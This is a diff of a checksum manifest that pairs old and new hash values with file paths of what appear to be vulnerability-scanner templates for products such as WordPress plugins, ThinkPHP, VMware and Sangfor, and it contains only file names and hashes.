-http/vulnerabilities/other/solar-log-authbypass.yaml:5bf5fde8d6949711a6e7b65c8017dc0b877cbab7 -http/vulnerabilities/other/solarview-compact-xss.yaml:7fc801d545081c095649a4e9bac756a5110923a1 -http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml:3d010722a42f99be4525d45547eb151a641ed140 +http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml:62da16e8e56c908cd561fd5578c3d7553261adb1 +http/vulnerabilities/other/solar-log-authbypass.yaml:e557f044cd0fbc0a8e233c9e7133ae8009083956 +http/vulnerabilities/other/solarview-compact-xss.yaml:48b3e8c88e7ba1ad49d09fffaa1db4e4f5535a12 +http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml:cdddd85379aae6bf06ef42540f80b9036e19a5dc http/vulnerabilities/other/sound4-file-disclosure.yaml:277c547bdfb65ff864cb0a916d081d8d80da3218 http/vulnerabilities/other/spark-webui-unauth.yaml:aa3f2f62a86d81bd989932daa108c77688661d2f http/vulnerabilities/other/sponip-network-system-ping-rce.yaml:f93a6eb65f7c5ca2972d68de7bf025c131eddbef -http/vulnerabilities/other/steve-xss.yaml:21a357ea4a24e91e05df58cb276dc68a5dffe118 -http/vulnerabilities/other/surrealtodo-lfi.yaml:ccf5b3a4cb85ea6d0413a83b989ea4ed5077cc8b -http/vulnerabilities/other/symantec-messaging-gateway.yaml:a03b046205ba4fd532ce91d6ed74507c2c8aa759 -http/vulnerabilities/other/tamronos-rce.yaml:87422a0198a7867503a9fa43e313d5667fb72af9 +http/vulnerabilities/other/steve-xss.yaml:3ef10201b0abae7f536e56dc0e3a678ac0c6bad1 +http/vulnerabilities/other/surrealtodo-lfi.yaml:4259089fe051f79292dc54e6ac9eb6312d17abc1 +http/vulnerabilities/other/symantec-messaging-gateway.yaml:c0c361bb663af4b65bb4e3f10b82ca355a4fca04 +http/vulnerabilities/other/tamronos-rce.yaml:4c8fa3c91d76be7e9d3b17e80db17d2f7324f3cd http/vulnerabilities/other/tekon-info-leak.yaml:0feeaf5e8dd9cb17c85e9fc6f47eb778845ee2e7 -http/vulnerabilities/other/thinkific-redirect.yaml:dd27d639a910a8c4d4daca362321881f1f8906ff -http/vulnerabilities/other/thruk-xss.yaml:4d417b86b81f61c2164cf2cdbf064acdd384720d +http/vulnerabilities/other/thinkific-redirect.yaml:55043a154d8e0463abca0f60f81388bdeb58fd3d +http/vulnerabilities/other/thruk-xss.yaml:a343c379ac263b9a54bb3d5127b3853a687db0a8 http/vulnerabilities/other/tianqing-info-leak.yaml:ee38b520bd1fb652b0287d6b6de4d903b469bc7d -http/vulnerabilities/other/tikiwiki-reflected-xss.yaml:4aef6418ddad6c8c2d676e32b684af9af7372691 +http/vulnerabilities/other/tikiwiki-reflected-xss.yaml:2d2633d0dc319a6adc4a709f9ba62d2a685d4341 http/vulnerabilities/other/tikiwiki-xss.yaml:f680884f48c5aa420678dd425ee28a9b2c8491ce -http/vulnerabilities/other/tpshop-directory-traversal.yaml:07cd48e65f461052f8452a2cef0d3eb997c5af36 -http/vulnerabilities/other/turbocrm-xss.yaml:2629e0f671d660c54bbf8f5bb4ce16d90fb78655 +http/vulnerabilities/other/tpshop-directory-traversal.yaml:f75255cf93044445910598403e03c7322eca023b +http/vulnerabilities/other/turbocrm-xss.yaml:a61f25fd73ec826811a349c3c2d38cb5219ec82b http/vulnerabilities/other/twig-php-ssti.yaml:c43b73600f5f4909ad39e53c37f99c186456160d -http/vulnerabilities/other/ueditor-file-upload.yaml:7a3d7b3af02a3be58a303edd84948f2ceeb1fc11 -http/vulnerabilities/other/umbraco-base-ssrf.yaml:a0269db92a4348d3e3adfc20bcaf0f926314e005 -http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:68801d2150f73f3c05b2681dd9a11f9fceb762c6 -http/vulnerabilities/other/unauth-spark-api.yaml:f32f198e95815090b9bf2a9896671194d2c53fb4 -http/vulnerabilities/other/unifi-network-log4j-rce.yaml:7841aba84b67b2d6fae9d1ba5d1f07c392946244 +http/vulnerabilities/other/ueditor-file-upload.yaml:e214f41b27de075e2b72128763f8f5e1ad041adc +http/vulnerabilities/other/umbraco-base-ssrf.yaml:259997b94bd51f95215469dbf56695c79449af4a +http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:c659f813bc845eecdc4ba687e1d4f69d9f56aa14 +http/vulnerabilities/other/unauth-spark-api.yaml:ba19de7e122546e3351c7b44438420d9898f123d +http/vulnerabilities/other/unifi-network-log4j-rce.yaml:1061fbc8297b368c976e54ca9eb9c7dbc7f4bc77 http/vulnerabilities/other/universal-media-xss.yaml:6b0e96c4a85b79e6fd04d703052c370c5c53400c -http/vulnerabilities/other/vanguard-post-xss.yaml:a5938303ad8526d3b6c374ecddaf6f4d21c864c8 -http/vulnerabilities/other/viewlinc-crlf-injection.yaml:0815d07a62e9cbb5011e07e9f6c21010ab5cafb8 +http/vulnerabilities/other/vanguard-post-xss.yaml:c6d4599c4ee2adfd089c642b72a5b5ab521ad732 +http/vulnerabilities/other/viewlinc-crlf-injection.yaml:09603d2c3419390397fe29dbe8a45f967ea99d6b http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:9a551f20b08199ea01ddf9f8a21a9dff0b1f44d1 -http/vulnerabilities/other/vpms-auth-bypass.yaml:13883ef1c0577d85c1c71b193e01c073c52b6d93 -http/vulnerabilities/other/wapples-firewall-lfi.yaml:3fd10989fff7aa51cd49f5d15daba69b3c61465e -http/vulnerabilities/other/watchguard-credentials-disclosure.yaml:6d118091cce3f45965d341fe3f0c7bca8b14ce6f +http/vulnerabilities/other/vpms-auth-bypass.yaml:bfceee99eee8c666e7ce02d6c9e211a3e9ca021a +http/vulnerabilities/other/wapples-firewall-lfi.yaml:21ce467ec0a5dc48039cb678005e41fe00a73e6a +http/vulnerabilities/other/watchguard-credentials-disclosure.yaml:ca1af20d21bf19e1f54bcf595dd296d9ab1b4d16 http/vulnerabilities/other/webpagetest-ssrf.yaml:b1845b10b8c76fbc0897d7e492bd5d7e1b4f08d9 -http/vulnerabilities/other/webui-rce.yaml:d73f83ec753c31d7cba1a01226aab442f09d93e6 -http/vulnerabilities/other/wems-manager-xss.yaml:2ad7df7b629fc06c5fa21757ea82a0f12c3ed4fe -http/vulnerabilities/other/wuzhicms-sqli.yaml:df75a597d929c0b2706836b50772751a9ca9c08b -http/vulnerabilities/other/xdcms-sqli.yaml:2affb6d5e6426806ae80680050ad32ede639f987 +http/vulnerabilities/other/webui-rce.yaml:d72c8bb9e11c6ad4e27526f4197153baf0651b06 +http/vulnerabilities/other/wems-manager-xss.yaml:edfcf535428fc69c927cde591e53b6389f2c699d +http/vulnerabilities/other/wuzhicms-sqli.yaml:91f6d455c46507b91b11fd0792ff64ce92b421f6 +http/vulnerabilities/other/xdcms-sqli.yaml:f6d2314ae41d60f7d7043db63588ddff4ee5fc93 http/vulnerabilities/other/xenmobile-server-log4j.yaml:afc3450b3af68b3105e63a1b369e855caffa5ae7 -http/vulnerabilities/other/xerox-efi-lfi.yaml:08df63570f3024bee4e3b01e7ef74dd222c2af4b -http/vulnerabilities/other/yapi-rce.yaml:57691e569537f29c47bbdef6c3780e9136f85c65 -http/vulnerabilities/other/yarn-resourcemanager-rce.yaml:ae2d9ffef01305deff5ff99f220885476adcfa52 -http/vulnerabilities/other/yeswiki-sql.yaml:d62cbfd76116aec05d5ff14bd54f50a74ab0c79b -http/vulnerabilities/other/yeswiki-stored-xss.yaml:b4174f2d4ae0dd963be6660ed576aadd97b03821 -http/vulnerabilities/other/yeswiki-xss.yaml:53adb0efa9242eeedd84ebb8fe91c2bb8ee052a2 -http/vulnerabilities/other/yishaadmin-lfi.yaml:33e4e5405685552e3445d931b6dd990d966b09b2 -http/vulnerabilities/other/zcms-v3-sqli.yaml:733ca8a7d5f6bb34ddcbe831644a019f1b34f410 -http/vulnerabilities/other/zimbra-preauth-ssrf.yaml:8340932344698ceef67879053745dfb1b3334b53 -http/vulnerabilities/other/zms-auth-bypass.yaml:57aa517099f16550077c36af1ee9208b80b2d60a -http/vulnerabilities/other/zms-sqli.yaml:b14efa23f6eeaf7941ae4c8cc5d514377e653751 -http/vulnerabilities/other/zzcms-xss.yaml:7a43b8efecd2030c318f6d1a82185d1651b88fab +http/vulnerabilities/other/xerox-efi-lfi.yaml:b4156ffe47ab6f3b9a9d827bfcb96a7fb513af5a +http/vulnerabilities/other/yapi-rce.yaml:7f4d9614e6db1838ce6e567e011fc26a188f13f2 +http/vulnerabilities/other/yarn-resourcemanager-rce.yaml:5a965b55a740217c6fc55eb5c6b9c85ada0f4d8e +http/vulnerabilities/other/yeswiki-sql.yaml:596c840553a3eb326c210484655762c335ed3362 +http/vulnerabilities/other/yeswiki-stored-xss.yaml:1a0b756a2cb815701ff041b0404142c019101c22 +http/vulnerabilities/other/yeswiki-xss.yaml:8892e257dd4bb9d545d2391b57758d7f6ebafc29 +http/vulnerabilities/other/yishaadmin-lfi.yaml:63820870477ec1ec3e36ab553dd2536c636ea044 +http/vulnerabilities/other/zcms-v3-sqli.yaml:b607ed0e698e35bdb00c28b597876d5e39d996ee +http/vulnerabilities/other/zimbra-preauth-ssrf.yaml:4a19286d996ffe67b723856a635452da05223540 +http/vulnerabilities/other/zms-auth-bypass.yaml:41d103ab6e30613eaa19e243fe466d1b64bcc490 +http/vulnerabilities/other/zms-sqli.yaml:896a7b5c81a24c1d3d538b359ce746a0204ea5f5 +http/vulnerabilities/other/zzcms-xss.yaml:72eebff4ebbba86b5bc53271862b95b392051b87 http/vulnerabilities/php/php-xdebug-rce.yaml:cf1ce0da8f7c4ea0a2905672df1113e8896c9863 http/vulnerabilities/phpmyadmin-unauth.yaml:7e7904d758845b3bc5e2b41a776b4ec53297e9fa -http/vulnerabilities/portainer-init-deploy.yaml:9d67545219dbc3c0acbb29d03c7ae92beed9ab01 +http/vulnerabilities/portainer-init-deploy.yaml:ca873fad7c351f3496bf0c16a36a5b2889b4e970 http/vulnerabilities/qibocms-file-download.yaml:7763d29c8ae95f8db4ccb87330ef4ba17d612e87 -http/vulnerabilities/rails/rails6-xss.yaml:9543de9254a36e71547873ceba8a6903cd40a082 +http/vulnerabilities/rails/rails6-xss.yaml:be4693b2fa2357ea1f472af859b4ad187c08981b http/vulnerabilities/ransomware/deadbolt-ransomware.yaml:e5607baf170fc08d2fd0624e52db07ec5f6e845e -http/vulnerabilities/rocketchat/unauth-message-read.yaml:9a9fbc583e10bd7b0aa171e729cd11a9db93da55 -http/vulnerabilities/royalevent/royalevent-management-xss.yaml:a34fa34974d07c33c7f082b8957b20df74662ffa -http/vulnerabilities/royalevent/royalevent-stored-xss.yaml:88400de9b1c5420f7900d5a9ae3b76c414899764 -http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:1856cfd976ffcb6a8b482333ebfcf14e91f0c915 -http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:48fb7cf0d7a975ed899b5a5a2f6a69f10038faae +http/vulnerabilities/rocketchat/unauth-message-read.yaml:8630c90c736c65206276411763120728acee0fbb +http/vulnerabilities/royalevent/royalevent-management-xss.yaml:d0b767e7f08117d1fa3a89d8b40e32f3dd8713bf +http/vulnerabilities/royalevent/royalevent-stored-xss.yaml:3d6127ac472e3c9dd8af375d0fc4d4a9c8059cd6 +http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:63eb5abebc6ec7d0055854820bf6267dfff1b41f +http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:3982a8ffcf669b467aea0c6399390dd878ee1efc http/vulnerabilities/ruijie/ruijie-password-leak.yaml:7d24e3ef4bb5d25b53d03c03351b6a179bd7dba8 -http/vulnerabilities/ruijie-eg-login-rce.yaml:53add6c1db37e6b522ec7cdb98e6cda342eade80 -http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:50f8f256ab12c4905bbcb2b0382e6e66ae6419fa -http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a8ada1a483f060c55a6dd0f795aa63f1d3ae8a95 -http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml:d3e0a362a82275e02eb3088b2a149d18e5b9f160 -http/vulnerabilities/sangfor/sangfor-ba-rce.yaml:bdd617837774877886b4d0aa4d387463779fe6ca -http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml:cd8b1a2eb4d3d1c32e9b92d5cf9c935b14ae849b -http/vulnerabilities/sangfor/sangfor-edr-rce.yaml:b437f16ee320e4cb33c5a04ee5fdc4cd79c45ce0 -http/vulnerabilities/seeyon/wooyun-2015-148227.yaml:280db640d6ac410d0594cb47911a69abaa8e0952 -http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml:d0f1939b9fdd032136c1c551db6d9cb6d0ebb3ea +http/vulnerabilities/ruijie-eg-login-rce.yaml:689b4c6366b5be4e4c708ed1d033c34571e9e7f0 +http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:3885a430391b500a5228f1cf97fb865989e28494 +http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:1f560d86b52d22467d8909d961fc8cb034cfc2c6 +http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml:e42864493d32b170f788e506c5155e2773d4757a +http/vulnerabilities/sangfor/sangfor-ba-rce.yaml:a209df79ba30018390c9b073e9a95b04847c7c64 +http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml:70d3869515f570a81f2d02560eded4b993f69c36 +http/vulnerabilities/sangfor/sangfor-edr-rce.yaml:df6a81d61c37ab20465d4813f87996d12bbd13a0 +http/vulnerabilities/seeyon/wooyun-2015-148227.yaml:08ed63eb05031b4eec0254c9378951d0a1195c45 +http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml:6915ee2d00659128d29a47da1b6781e338fc9c5d http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml:4682cf1b5cd4d6eb1390de101c2e80ef9d1832ed http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml:206e69434dcd7c95483ca9d1c6d77238e5b51b2f -http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml:92a75adaaca05b9c612e9b6188b595be6b340965 +http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml:1962b0c186d588742508f73b5134511990e2162d http/vulnerabilities/sitecore/sitecore-xml-xss.yaml:414d0c93f794d0a8fb943d2a9ae65feb54d8a350 http/vulnerabilities/splash/splash-render-ssrf.yaml:ebc36380b220da7c0a2f6654da0706cc8cca1a9b http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml:23a9d66f61a0d2e221d10633b36c41eaca9c6f9d -http/vulnerabilities/springboot/springboot-h2-db-rce.yaml:f5493f5f944833e72d54a4f3e2f5eb28dd0b0961 -http/vulnerabilities/springboot/springboot-log4j-rce.yaml:d90efd6782a4b794d53d7ce71c2ca15437fbfa31 -http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml:eb95b10ecd74c36f7a942bf4738f2811add2c164 -http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml:fe563088156c173a8025df5a4ccaaa8dbe31f966 -http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml:a25ebb434de54698e0844933526f4a24db969ec1 -http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml:0a37050caf23b0c035650d135aa088869a80d082 -http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml:3da913d26d008c2d85aef7a97649ec7a918e01f0 -http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml:f0fcf6b8a74e2cf9efeba70e6995b775671f06ab -http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml:668735e412633a94fbd95b9f558db4826df9704c -http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:2b3fbad0ad1fd3606586b4facd5e95e037cea19e -http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:747ae19f0b6cc03839c70af199ec84da276d0e1e -http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:729d0a92626be9800a198b53daebd926696a310f -http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:ab357298992729dff05c31390ac5fdc322d9d050 -http/vulnerabilities/tongda/tongda-path-traversal.yaml:90f4be943be226e49884a2799739ae37058f6da1 +http/vulnerabilities/springboot/springboot-h2-db-rce.yaml:61e0b95b13f457f6eb33edd90a0fb385f7a2f6e1 +http/vulnerabilities/springboot/springboot-log4j-rce.yaml:53ea3bedd73cdf0f06578864dc89789d8101a908 +http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml:ce8c525f0852606913993e565108e3984e1efd1b +http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml:53daa13f085a55a39288bf0dad10cbae08884eff +http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml:1fab2b44de3eecc9988ad0ace48588a80784e000 +http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml:299eb129179d1eef257afea3ca9e6e51537d07df +http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml:27ea387bd38b1755c93d9b178a1327bbb3e48e1b +http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml:1ceb776d01ad78e72820766ae3e84c81eee4feac +http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml:a72f839f2a6932b2de6238b9ca91299d13b6cd1f +http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:43f190757d442c2aa7a0aaa76ffc6222ab769e4c +http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:077583bfac63986d89b0f015675c7d16c7c1866d +http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:130d4c7b7e62bc968ef1418802166df675e65a32 +http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:b4084007e891dabf45821aab3bad769da49285af +http/vulnerabilities/tongda/tongda-path-traversal.yaml:1adaeb049038fb9b6a3cba8bfc41b40866d35d0b http/vulnerabilities/tongda/tongda-session-disclosure.yaml:9ab8de0c9ba380229cb61d4f749eaafea23f64c7 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:59f1815fd6ff8314541d7c8b9a64766064ae2dcd http/vulnerabilities/ueditor/ueditor-xss.yaml:1f3fd8ac6e5c9609feb4fe1af9076cfc55a08e49 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:0525410ad7ce820e401f4ccc287476aa53371b0e -http/vulnerabilities/videoxpert-lfi.yaml:836bb554cd7ec42e4a17fa9bae56fd2421ec2e39 +http/vulnerabilities/videoxpert-lfi.yaml:7e179c01515166551a95827b8a4d985db979ad5f http/vulnerabilities/vmware/vmware-cloud-xss.yaml:c0243e1d7832ef97c178ce2724abf50b6b46d1cb -http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:405880ff0d7b2f086a86c89d146c869c8974d259 -http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml:6ef519ca8acb3cbec8dac51386f40499af4c1740 +http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:0e6085122133d068289490ddbd7c4e5652a5990f +http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml:332e05728c501bdd2a52aa1fb90009eaeebcc061 http/vulnerabilities/vmware/vmware-nsx-log4j.yaml:93ee210255fdfa653f4160babe50be74cab05577 http/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml:b454005fe9d8e2dc985a0c8595a0ccee565c4f40 http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml:ac0fbdc5e0d02745052914ce017e38e5887173c3 http/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml:66ac016878673d1e5eb2a757ee9f4db828d93825 -http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml:5a6fa7c5f845686f698d9c136094b9f5264622c9 -http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml:3b77c5a78748dd232c83d52cb222e85dab541da8 +http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml:a96cb9f082ddd0851f8f2ece4b7cfafed431cdaa +http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml:e7b0be4038422609794982c9bcec12dd7a8cf301 http/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:a74604d9701e772e3d49873a13ecc48cb8fc0f9a -http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:085b18ce9ee40ee5224279cf006f9aa4be09f3e3 -http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml:41b5d217366725503d63f0586ca2b7eb56c6a0cd -http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml:d743b5d35583c2ba70d722850f0ee84727c5f79c +http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:4513b7a7cf9a9988a80a430addeb125a1ab73951 +http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml:0a3d63055a1c1f33e5300eb88a9fc1ecfc245928 +http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml:ae1c04ba45dc3c1cfd1b403e90856f3db430a82a http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml:1320d348735dd65472613cefdac4c7618bd312dd -http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml:4b95fac76f2076e0d6fa32b767283a79c973fa96 -http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:00da963e7b9358c2484f73294ef22c46d5a4700f -http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:2b74c0f775e54b912cbed34a4edc942b05a62478 -http/vulnerabilities/weaver/oa-v9-uploads-file.yaml:92a7f992b42a1ba4b1ddc52b9f413bf28d3729c4 -http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:698b60f8afd96db24edaf1c10d5c7e50dbbc9488 +http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml:b64e0c558600ff0d335b85bbe9b391fed4aed2cd +http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:d2365b7d9e05b637a00890dc2e6123da13d812f9 +http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:883c99908c9e6ba6a9f3c2ff770db9325c581cd9 +http/vulnerabilities/weaver/oa-v9-uploads-file.yaml:4f2e2a86334334b312281ca9e804aff5de3f2d47 +http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:d1f9ee70aae38699a3002ec5e02073fba05af3ea http/vulnerabilities/wordpress/3d-print-lite-xss.yaml:c734362732a3c1589beda39fa1e2fdd1174f104f -http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:904248773cfa434f65196cd1303ef62da7c7f06f -http/vulnerabilities/wordpress/404-to-301-xss.yaml:8b08b7ec58862e296d22a2adc5edbf2cf95f68fd -http/vulnerabilities/wordpress/ad-widget-lfi.yaml:68a0e12c4220208e2e7beff128f61c600cfd4efc -http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml:3d584706a4a3475ab7a82c8d653f4158a15e8115 +http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:188922af0850946cbbf0d092d0c1fb9abc0deb1a +http/vulnerabilities/wordpress/404-to-301-xss.yaml:18c5efd5b683d0204c4d026e7d4ca5e09590017b +http/vulnerabilities/wordpress/ad-widget-lfi.yaml:070530812d116c2b13828f5c6de109d4d93eb063 +http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml:63481a0d7d9cb478c9d0c0daa9e991797e0e5105 http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml:971343a64bc5d110ef5798fc3b30813a00f90ee2 -http/vulnerabilities/wordpress/age-gate-open-redirect.yaml:b852e0d1371d85ee159bcace4d7a322eeda6939e -http/vulnerabilities/wordpress/age-gate-xss.yaml:6fa47a7e8aece52f13b2a3120f77bf83b006a4c0 -http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:95f9f240480f1fcce4386796c652bf0609d98260 +http/vulnerabilities/wordpress/age-gate-open-redirect.yaml:2f0600f7e2e6000a34bc2382eced7783d7052987 +http/vulnerabilities/wordpress/age-gate-xss.yaml:7df68ccaae644d58ef5b13d5c0ae881baca77138 +http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:c3ea1dd354fa027e4138450c236264afb207acff http/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml:3e7616b81f228471719526279ff7cbba976c56b9 -http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml:c7d7416a24c89914fe90ba1404b2397b36baff64 -http/vulnerabilities/wordpress/analytify-plugin-xss.yaml:c055ff3c8489b62344fea2e30b58ab40782ea5fa -http/vulnerabilities/wordpress/aspose-file-download.yaml:f7a75fe52594c373e8ceff8a2a4649a1e3a1b067 -http/vulnerabilities/wordpress/aspose-ie-file-download.yaml:ebb57cf8d270bba4ad7f58cf05eacc2bba22ab27 -http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml:aa7a7d76b30538a20e95973685013b166c719c6f -http/vulnerabilities/wordpress/aspose-words-file-download.yaml:eb70264ed9a8e729ad66c99de9a7e919b317d380 -http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml:54d2551a8ec679d5b6af21749c78785103c85579 -http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml:8ceefd338e6aa9b54d4823e9b145b7dcd148837a -http/vulnerabilities/wordpress/brandfolder-lfi.yaml:3cb167a50d49ab390f38774ade8065bc876a7118 -http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml:e130b9b08ab5a52e9e1485a47d9b82336122de70 -http/vulnerabilities/wordpress/calameo-publications-xss.yaml:cd3ecff7e80f8dd7703719df2d20273920f34ac0 -http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml:ca08ce6f702902235e9afd67f29aa258fed71c6c -http/vulnerabilities/wordpress/cherry-file-download.yaml:e6db824d92d68315e66c71cb94438b79dcb73898 -http/vulnerabilities/wordpress/cherry-lfi.yaml:90fc89067aafd825046fd015ae87ebb143e92f02 -http/vulnerabilities/wordpress/church-admin-lfi.yaml:2165e7fcf166e79cc204321d693c625dd69e2b32 -http/vulnerabilities/wordpress/churchope-lfi.yaml:5e180f7c3f4001a407a44bc6866e7177bb258df2 -http/vulnerabilities/wordpress/clearfy-cache-xss.yaml:f263b420987727d7c5c5221262fc0ffbfb47ceb7 -http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml:f8683ad9bc7478dacf1da439ad369301653a121b -http/vulnerabilities/wordpress/curcy-xss.yaml:90012ef32809c74fb2da3ba0261774eb2933bdd2 -http/vulnerabilities/wordpress/diarise-theme-lfi.yaml:9d2890355a5ae74009c6d0f1c27f366615bd1cd8 +http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml:2ef6305da85c974eaa63b7d98cc232469dabc881 +http/vulnerabilities/wordpress/analytify-plugin-xss.yaml:18496ebaa5f786c54ddf2d27da22d04009d84e84 +http/vulnerabilities/wordpress/aspose-file-download.yaml:95b6c4955d6dffe62e2a8edcba7dd27afc7d3d6f +http/vulnerabilities/wordpress/aspose-ie-file-download.yaml:8e8a4b298cd3ae7b1825ccc197285e17b1817153 +http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml:22fe9782f197b5d7def03e90f32b060319d2d300 +http/vulnerabilities/wordpress/aspose-words-file-download.yaml:1c640f8e4318ed7d3cfc654bf057663f58a5c350 +http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml:a9e4f665ab64e5d080e5604a3e8b61a17706241b +http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml:1d7d5620cba08a73a9401fe1eee1c5e7a5db0e66 +http/vulnerabilities/wordpress/brandfolder-lfi.yaml:cd5a899c750dd80fb5344fb54ee88f88e0b5c6b6 +http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml:ab4c9a8fc911c9b4a99cbca89a190480278568e1 +http/vulnerabilities/wordpress/calameo-publications-xss.yaml:46b77732c4a6a47f370ea768ef7b51bf2b897d8a +http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml:1cd189e9de8515668232646ad85d54f2dcd41082 +http/vulnerabilities/wordpress/cherry-file-download.yaml:323d3a56e7d70625283feda9f02c5d376f5c8193 +http/vulnerabilities/wordpress/cherry-lfi.yaml:603a7543ac160eb853b2ead8c453ff4f51bb1538 +http/vulnerabilities/wordpress/church-admin-lfi.yaml:d541d193ac336e2cecc3f1787e01c1a06a7d9493 +http/vulnerabilities/wordpress/churchope-lfi.yaml:3892bb31bd1611ce499bde8f2bce7d8f10063392 +http/vulnerabilities/wordpress/clearfy-cache-xss.yaml:5943aa3840feee68a1ea0a5576d06d1a13d309f6 +http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml:64298760fbe66bafda61568f7c61f5eff594bf8c +http/vulnerabilities/wordpress/curcy-xss.yaml:346bb8bbd72e12260b80a55b723d66ab19176d1c +http/vulnerabilities/wordpress/diarise-theme-lfi.yaml:d977f9c6e8cbcd5c5cef0474ca9bbe9bac4d8b81 http/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml:cecd25463d1d9b724118597a1c3e374b80790126 http/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml:b8ccd4ba05a8bfc0c6d0ea623bc90ddb7d3b69eb -http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml:7ee0ced2b95edf3f5922a577278cc133fb954c0a -http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml:5b06aa27b20163d629527964984e2d4a912b4c10 -http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml:4dc4fd6aa6f78bffa8afaf7b02a049169412b8ef -http/vulnerabilities/wordpress/hb-audio-lfi.yaml:2bcf09a94fb532d68bfaf95a7d8e03b96e1512c4 -http/vulnerabilities/wordpress/health-check-lfi.yaml:d8e897d164a46f0f7a91cffc5c2fc96ef44f4c9e 